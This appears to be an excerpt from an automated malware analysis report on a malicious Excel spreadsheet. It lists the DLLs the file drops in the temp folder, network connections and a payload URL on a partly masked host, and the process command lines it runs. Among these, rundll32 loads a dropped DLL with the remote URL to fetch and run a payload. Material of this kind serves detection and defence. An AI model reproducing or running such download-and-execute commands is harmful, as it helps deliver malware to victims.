Technical Information
- %TEMP%\~0d38qybzxkf.dll
- <PATH_SAMPLE>.xlsx
- %TEMP%\~ntysngmrdonoprg.dll
- %TEMP%\~0d38qybzxkf.dll
- %TEMP%\~ntysngmrdonoprg.dll
- 'sr###r.icp.cool':80
- 'sr###r.icp.cool':55241
- http://sr###r.icp.cool/sgdo/xovqe/bosign.svg
- 'sr###r.icp.cool':55241
- DNS ASK sr###r.icp.cool
- ClassName: 'XLMAIN' WindowName: 'Microsoft Excel (Product Activation Failed) - Book1'
- ClassName: 'XLMAIN' WindowName: ''
- '%ProgramFiles%\microsoft office\office14\excel.exe' /dde' (with hidden window)
- '<SYSTEM32>\rundll32.exe' %TEMP%\~0D38qYbzxKf.dll,run http://sr###r.icp.cool/sgdo/xovqe/bosign.svg|<Full path to file>|%TEMP%\
- '<SYSTEM32>\rundll32.exe' url.dll,FileProtocolHandler <PATH_SAMPLE>.xlsx
- '<SYSTEM32>\rundll32.exe' %TEMP%\~NTySNgMRDOnoprG.dll,entrypoint
- '%ProgramFiles%\microsoft office\office14\excel.exe' /dde